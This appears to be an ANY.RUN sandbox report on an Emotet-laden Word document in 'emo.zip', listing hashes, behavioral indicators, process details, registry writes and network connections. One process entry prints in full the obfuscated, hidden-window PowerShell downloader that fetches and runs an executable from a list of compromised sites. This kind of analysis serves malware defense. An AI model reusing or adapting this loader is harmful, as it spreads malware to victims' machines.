File name:

emo.zip

Full analysis: https://app.any.run/tasks/83defc93-1dc9-4f5b-b749-57cec6242d0b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 15, 2024, 20:33:09
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
emotet-doc
emotet
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

90B109613C490CD016AD5A3E81391262

SHA1:

6B3B85895CA5338B09CAB0BE9373FB3B3D8ECA69

SHA256:

3F225FBA4F95616CA4EEEBF19F0AD0E888A408346E1B38414FEA9809E77EF579

SSDEEP:

3072:g8i+3dbMz73Hu8v9TTi4BI/yA4Pl2aC/eXd:xi+Nb273u8v9TPSYUJGXd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • WinRAR.exe (PID: 5960)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7016)
  • SUSPICIOUS

    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 6564)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7016)
    • Executed via WMI

      • powershell.exe (PID: 7016)
    • Creates a directory (POWERSHELL)

      • powershell.exe (PID: 7016)
    • The process executes via Task Scheduler

      • UCPDMgr.exe (PID: 4428)
    • Reads security settings of Internet Explorer

      • TextInputHost.exe (PID: 4080)
    • Unusual connection from system programs

      • powershell.exe (PID: 7016)
  • INFO

    • Create files in a temporary directory

      • powershell.exe (PID: 7016)
    • Reads mouse settings

      • WINWORD.EXE (PID: 6564)
    • Manual execution by a user

      • WINWORD.EXE (PID: 6564)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 7016)
    • Reads the software policy settings

      • powershell.exe (PID: 7016)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7016)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 7016)
    • Checks proxy server information

      • powershell.exe (PID: 7016)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7016)
    • Reads the computer name

      • TextInputHost.exe (PID: 4080)
    • Checks supported languages

      • TextInputHost.exe (PID: 4080)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x000b
ZipCompression: Deflated
ZipModifyDate: 2020:11:02 18:14:28
ZipCRC: 0x964ff0d0
ZipCompressedSize: 99325
ZipUncompressedSize: 210432
ZipFileName: emo.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
149
Monitored processes
11
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs rundll32.exe no specs winword.exe powershell.exe conhost.exe no specs ai.exe no specs filecoauth.exe no specs filecoauth.exe no specs textinputhost.exe no specs ucpdmgr.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
4080"C:\WINDOWS\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mcaC:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Version:
123.26505.0.0
Modules
Images
c:\windows\systemapps\microsoftwindows.client.cbs_cw5n1h2txyewy\textinputhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\systemapps\microsoftwindows.client.cbs_cw5n1h2txyewy\vcruntime140_app.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
4428"C:\WINDOWS\system32\UCPDMgr.exe"C:\Windows\System32\UCPDMgr.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
User Choice Protection Manager
Exit code:
0
Version:
1.0.0.414301
Modules
Images
c:\windows\system32\ucpdmgr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
4640\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeUCPDMgr.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5960"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\emo.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
6236C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -EmbeddingC:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft OneDriveFile Co-Authoring Executable
Exit code:
0
Version:
19.043.0304.0013
Modules
Images
c:\users\admin\appdata\local\microsoft\onedrive\19.043.0304.0013\filecoauth.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
6512C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
6560C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -EmbeddingC:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft OneDriveFile Co-Authoring Executable
Exit code:
0
Version:
19.043.0304.0013
Modules
Images
c:\users\admin\appdata\local\microsoft\onedrive\19.043.0304.0013\filecoauth.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
6564"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\admin\Desktop\emo\emo.doc" /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
7016POwersheLL -windowstyle hidden -ENCOD   S V     0 z X   ( [ T y P e ] ( " { 2 } { 0 } { 4 } { 3 } { 1 } " - f   ' e ' , ' r E C t o r Y ' , ' s Y s t ' , ' . I O . d I ' , ' M ' )     )   ;       s e t     T x y S e o     (     [ T Y p e ] ( " { 0 } { 7 } { 5 } { 6 } { 4 } { 2 } { 1 } { 8 } { 3 } " - F ' S Y s T E ' , ' T M ' , ' I N ' , ' E R ' , ' p O ' , ' N e T . s e ' , ' R V I C E ' , ' M . ' , ' A N a G ' ) )   ;     $ N b f 5 t g 3 = ( ' B 9 ' + ' y p ' + ( ' 9 0 ' + ' s ' ) ) ; $ V x n l r e 0 = $ C l u d k j x   +   [ c h a r ] ( 6 4 )   +   $ R 6 r 1 t u y ; $ K y 3 q 0 e 8 = ( ( ' R q ' + ' d x ' ) + ' w o ' + ' 5 ' ) ;     (     D i r     v a R i A b l e : 0 Z x ) . v a l u E : : " C r e A T ` E ` d I R E c ` T ` O r Y " ( $ H O M E   +   ( ( ( ' n D p ' + ' J r b ' ) + ( ' e ' + ' v k 4 n ' ) + ' D ' + ' p ' + ( ' C ' + ' c w r _ 2 h ' ) + ' n D ' + ' p ' )   - R e P l A c E   ( ' n ' + ' D p ' ) , [ c H a R ] 9 2 ) ) ; $ F N 5 g g m s H   =   ( 1 8 2 , 1 8 7 , 2 2 9 , 1 4 6 , 2 3 1 , 1 7 7 , 1 5 1 , 1 4 9 , 1 6 6 ) ; $ P y o z g e o = ( ( ' J 5 f ' + ' y 1 ' ) + ' c ' + ' c ' ) ;   (     v a R i A B L E   T x Y S E o     ) . V a l u E : : " S e c U r I ` T Y p ` R ` O t O c ` o l "   =   ( ( ' T l ' + ' s 1 ' ) + ' 2 ' ) ; $ F N 5 g g m s H   + =   ( 1 8 6 , 1 4 1 , 2 2 8 , 1 8 2 , 1 7 7 , 1 7 1 , 2 2 9 , 2 3 6 , 2 3 9 , 2 3 9 , 2 3 9 , 2 2 8 , 1 8 1 , 1 8 2 , 1 7 1 , 2 2 9 , 2 3 4 , 2 3 9 , 2 3 9 , 2 2 8 ) ; $ H u a j g b 0 = ( ( ' J n ' + ' o ' ) + ' 5 g ' + ' a 1 ' ) ; $ B b 2 8 u m o   =   ( ( ' A l e ' + ' 7 g ' ) + ' _ 8 ' ) ; $ H s c e _ j s = ( ' K v ' + ( ' n b ' + ' o v _ ' ) ) ; $ S p k 5 1 u e = ( ( ' C ' + ' 7 x o ' ) + ' 9 g ' + ' l ' ) ; $ S c u s b k j = $ H O M E + ( ( ' 5 ' + ' t ' + ( ' f ' + ' J r b e v ' + ' k ' ) + ( ' 4 5 t f ' + ' C c ' + ' w ' ) + ' r ' + ( ' _ 2 h ' + ' 5 t f ' ) )   - r E p l A C E     ( [ C h A R ] 5 3 + [ C h A R ] 1 1 6 + [ C h A R ] 1 0 2 ) , [ C h A R ] 9 2 ) + $ B b 2 8 u m o + ( ( ' . e ' + ' x ' ) + ' e ' ) ; $ F N 5 g g m s H   + =   ( 1 8 5 , 1 7 9 , 1 9 0 , 1 8 4 , 2 2 9 , 1 5 1 , 1 3 9 , 1 5 7 , 1 6 4 , 2 3 5 , 1 7 7 , 2 3 9 , 1 7 1 , 1 8 3 , 2 3 6 , 1 4 1 , 1 2 8 , 1 8 7 , 2 3 5 , 1 3 4 , 1 2 8 , 1 5 8 , 1 7 7 , 1 7 6 , 1 3 9 ) ; $ h b m s k V 2 T = ( ( ' C ' + ' 7 x o ' ) + ' 9 g ' + ' l ' ) ; $ h b m s k V 2 T = $ H O M E + ( ( ' 5 ' + ' t ' + ( ' f ' + ' J r b e v ' + ' k ' ) + ( ' 4 5 t f ' + ' C c ' + ' w ' ) + ' r ' + ( ' _ 2 h ' + ' 5 t f ' ) )   - r E p l A C E     ( [ C h A R ] 5 3 + [ C h A R ] 1 1 6 + [ C h A R ] 1 0 2 ) , [ C h A R ] 9 2 ) + $ B b 2 8 u m o + ( ( ' . c ' + ' o ' ) + ' n f ' ) ; $ Q 1 _ y 0 5 _ = ( ' W ' + ( ' 4 ' + ' q v y ' ) + ' z 8 ' ) ; $ O d b 3 h f 3 = & ( ' n ' + ' e ' + ' w - o b j e c t ' )   N e t . W E B c l I E N t ; $ F N 5 g g m s H   + =   ( 1 8 3 , 1 5 4 , 1 7 3 , 1 2 8 , 1 7 5 , 1 5 1 , 2 3 8 , 1 4 0 , 1 8 3 , 1 6 2 , 2 2 8 , 1 7 0 , 1 7 3 , 1 7 9 , 2 2 9 ) ; $ A n b y t 1 y = ( ' h ' + ( ' t t p : ' + ' ] [ ' + ' ( s ) ] ' ) + ( ( ' w ] ' + ' [ ( ' ) ) + ( ( ' s ) ' + ' ] w ' ) ) + ( ' d a ' + ' - ' ) + ' i ' + ' n ' + ' d u ' + ( ' s ' + ' t r i a l . ' + ' h ' + ' t ' ) + ' b ] ' + ( ' [ ( s ) ] ' + ' w ' + ' j s ' ) + ( ( ' ] ' + ' [ ( ' ) ) + ( ( ' s ' + ' ) ] w 9 I d L ' + ' P ] [ ' + ' ( s ' + ' ) ] w ' + ' @ h ' ) ) + ( ' t ' + ' t p : ] ' ) + ( ' [ ( s ' + ' ) ] ' ) + ' w ' + ( ' ] ' + ' [ ( s ) ] ' ) + ( ' w d a p ' + ' r o ' + ' f e s i o n a ' + ' l . h ' ) + ' t b ' + ( ' ] [ ( s ' + ' ) ' + ' ] ' ) + ' w ' + ( ' d ' + ' a t a ' ) + ( ' 4 ] [ ( s ' + ' ) ] w h ' ) + ( ' W g W ' + ' j T ' ) + ( ' V ] ' + ' [ ' ) + ( ' ( s ) ] w @ h t t p ' + ' s : ] [ ( s ' + ' ) ] ' + ' w ' + ' ] ' ) + ' [ ' + ( ' ( s ) ' + ' ] w d a g ' + ' r a ' ) + ' n i ' + ' t ' + ( ' e g ' + ' i a ' ) + ( ' r e . h ' + ' t ' ) + ' b ] ' + ( ' [ ' + ' ( s ) ' ) + ( ' ] w w ' + ' p - a ' + ' d m ' + ' i n ] [ ( s ) ' + ' ] w t ' ) + ( ' V ] [ ' + ' ( s ' + ' ) ' ) + ( ' ] w @ ' + ' h ' ) + ' t t ' + ' p ' + ( ' : ' + ' ] [ ' ) + ( ' ( s ) ] w ] [ ' + ' ( s ' + ' ) ] w w w ' + ' w ' + ' . o u t ' + ' s ' + ' p ' ) + ( ' o k ' + ' e ' ) + ' n v ' + ' i ' + ( ' s ' + ' i o n s . ' ) + ( ' h t b ' + ' ] ' ) + ' [ ' + ( ' ( s ) ] w ' + ' w p ' + ' - i n ' ) + ( ' c l u ' + ' d ' ) + ( ' e s ] [ ( s ) ' + ' ] w a W ' + ' o ' + ' M ' ) + ( ' ] ' + ' [ ( ' + ' s ) ] w ' ) + ( ' @ ' + ' h t t p : ] ' ) + ( ' [ ( s ) ' + ' ] w ] [ ( ' + ' s ) ' ) + ( ' ] w m o ' + ' b s ' ) + ( ' o ' + ' u k . h ' ) + ( ( ' t ' + ' b ] [ ( ' ) ) + ( ( ' s ) ' + ' ] w w p - ' ) ) + ' i n ' + ' c ' + ' l ' + ( ' u d e ' + ' s ] ' + ' [ ' ) + ( ' ( s ) ] ' + ' w ' ) + ( ' U Y ' + ' 3 0 R ] ' ) + ( ' [ ( s ' + ' ) ] w ' + ' @ ' + ' h ' + ' t t p : ] [ ' ) + ( ' ( ' + ' s ) ] w ' ) + ( ' ] [ ' + ' ( s ) ' ) + ( ' ] ' + ' w b ' ) + ' i ' + ( ' g ' + ' l a u g h ' + ' s ' ) + ( ( ' . h ' + ' t ' + ' b ] [ ( s ' ) ) + ( ( ' ) ] ' ) ) + ( ' w s ' + ' m a l l p o t ' + ' a t o ' ) + ' e s ' + ( ( ' ] ' + ' [ ( s ' ) ) + ( ( ' ) ] w Y ] ' + ' [ ( s ' + ' ) ] w ' + ' @ h ' + ' t t p s : ] [ ( s ) ' ) ) + ' ] w ' + ( ' ] [ ( ' + ' s ) ] w n ' + ' g ' ) + ( ' l l ' + ' o ' ) + ( ' g i s t ' + ' i ' ) + ( ' c s . ' + ' h ' ) + ' t ' + ( ' b ] ' + ' [ ' + ' ( ' + ' s ) ] w ' ) + ' a d ' + ( ' m i ' + ' n ' ) + ' e r ' + ' ] ' + ( ' [ ( s ' + ' ) ] w ' + ' W 3 m ' ) + ' k ' + ( ( ' B ' + ' ] [ ( s ' ) ) + ( ( ' ) ' + ' ] w ' ) ) ) . " r e p ` L A c E " ( ( ' ] ' + ' [ ' + ( ' ( s ) ] ' + ' w ' ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x w ' + ' e ' ) ) [ 0 ] ) . " s P ` l I T " ( $ I v g 3 z c u   +   $ V x n l r e 0   +   $ J z a e w d y ) ; $ G c o y v l v = ( ( ' K f ' + ' _ ' ) + ( ' 9 ' + ' e t 1 ' ) ) ; f o r e a c h   ( $ A 8 i 3 k e 1   i n   $ A n b y t 1 y ) { t r y { $ O d b 3 h f 3 . " d O ` W n L O A ` d f I L e " ( $ A 8 i 3 k e 1 ,   $ S c u s b k j ) ; $ Z h c n a u x = ( ( ' E k ' + ' k ' ) + ( ' j ' + ' 4 7 t ' ) ) ; I f   ( ( & ( ' G e t - I ' + ' t e ' + ' m ' )   $ S c u s b k j ) . " L E n ` G T h "   - g e   4 5 1 9 9 )   { $ { A 8 ` I ` 3 K E 1 } . ( " { 1 } { 2 } { 0 } "   - f ' a y ' , ' T o C h a ' , ' r A r r ' ) . I n v o k e ( )   |   . ( " { 2 } { 1 } { 0 } { 3 } "   - f ' - ' , ' a c h ' , ' F o r E ' , ' O b j e c t ' )   - p r o c e s s   {   $ { F N 5 ` G G m ` S h }   + =   ( [ b y t e ] [ c h a r ] $ { _ }   - b x o r   0 x d f   )   } ;   $ F N 5 g g m s H   + =   ( 2 2 8 ) ;   $ b 0 R j e   =     [ t y p e ] ( " { 1 } { 0 } "   - F ' V e r T ' , ' C o n ' ) ;       $ B 0 R j E : : " t O ` B a S ` E 6 4 S ` T R I ` N g " ( $ { f n 5 ` g g m ` s h } )   |   . ( " { 2 } { 1 } { 0 } "   - f   ' i l e ' , ' u t - f ' , ' o ' )   $ { h B ` m S K ` V 2 T } ;   ( [ w m i c l a s s ] ( ( ' w i ' + ' n ' ) + ( ' 3 2 _ ' + ' P r o c ' + ' e ' ) + ' s ' + ' s ' ) ) . " c R ` e a T E " ( $ S c u s b k j ) ; $ G l w k i 6 a = ( ' I ' + ' m ' + ( ' t d ' + ' x v 6 ' ) ) ; b r e a k ; $ P f p b l h 1 = ( ' V s ' + ( ' l a l ' + ' c ' ) + ' u ' ) } } c a t c h { } } $ F 4 7 i e f 2 = ( ( ' B n ' + ' z i d ' ) + ' r t ' )  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7028\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
29 701
Read events
29 187
Write events
461
Delete events
53

Modification events

(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\emo.zip
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(5960) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3c\52C64B7E
Operation:writeName:@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\oregres.dll,-120
Value:
Microsoft Word 97 - 2003 Document
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:writeName:0
Value:
C:\Users\admin\Desktop\emo
Executable files
10
Suspicious files
133
Text files
42
Unknown types
1

Dropped files

PID
Process
Filename
Type
5960WinRAR.exeC:\Users\admin\Desktop\emo\emo.docdocument
MD5:3079AF4D01EE6EC51BD3D9911DA7E23F
SHA256:C578A9FC241658517A7346A2A60236C84F0BB4919B857DB226150AAB4093451E
6564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\Personalization\Governance\Anonymous\floodgatecampaigns.json
MD5:
SHA256:
6564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Jsonbinary
MD5:036628E3E3F0728DAA7D53AC1B3EF8CC
SHA256:2CAEC4D00BD356241B8B405B1B74386C677D501A7A23CE6EF916EAF912541544
6564WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64Abinary
MD5:9E40B894A10A87FC31B3D82C7622081A
SHA256:1D578B895886D6621CB8990D52318A0587BDE0F86EE905D037E42B31DB80C8E1
6564WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\emo.doc.LNKbinary
MD5:47E633D77415283D9B25528969F486B1
SHA256:901F335E7528ADA9D6E0A4C6B379FAC9B1006881DB054EE6163964B6C5C1185C
6564WINWORD.EXEC:\Users\admin\Desktop\emo\~$emo.docbinary
MD5:B95667FF3690A6DF77AE5EA468FAA23F
SHA256:3693EEAA9F988DFB8C867F0D384951ACFDE95BD7CA4678E42E10A1D5B6181720
6564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bintext
MD5:CC90D669144261B198DEAD45AA266572
SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
6564WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:A7022C1B6DCAADAC50685DCA8B8AB1F2
SHA256:ACBCC93B197FFFBEAEB0FD18C1913147C50F57E3E5949D37973B496C4DE55A81
6564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bintext
MD5:56313FC6A87AC5A7B8A7DCFEA4E1F782
SHA256:82FDA4D3680E880A4FFD3B3ABC82214B12A7AD6D9658C87463B9F74E6AB4974D
6564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbresbinary
MD5:727B245A3BFF2F98AF380C9A6F2B4FC8
SHA256:AD840617C0F6DEECA99120DD7D9A161981D5C110D03C832AF9E44C783E60B1E6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
16
TCP/UDP connections
149
DNS requests
42
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5548
svchost.exe
GET
200
23.45.176.171:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
5548
svchost.exe
GET
200
2.21.17.194:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
920
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
unknown
6564
WINWORD.EXE
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
unknown
6976
SIHClient.exe
GET
200
2.21.17.194:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
unknown
6976
SIHClient.exe
GET
200
2.21.17.194:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
unknown
4996
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
unknown
6564
WINWORD.EXE
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
unknown
6564
WINWORD.EXE
GET
200
23.45.176.171:80
http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
unknown
unknown
6564
WINWORD.EXE
GET
200
23.45.176.171:80
http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4364
svchost.exe
239.255.255.250:1900
unknown
4
System
192.168.100.255:137
whitelisted
5548
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4080
RUXIMICS.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5140
MoUsoCoreWorker.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5548
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5548
svchost.exe
23.45.176.171:80
crl.microsoft.com
Akamai International B.V.
US
unknown
5548
svchost.exe
2.21.17.194:80
www.microsoft.com
AKAMAI-AS
BE
unknown
920
svchost.exe
20.190.159.68:443
login.live.com
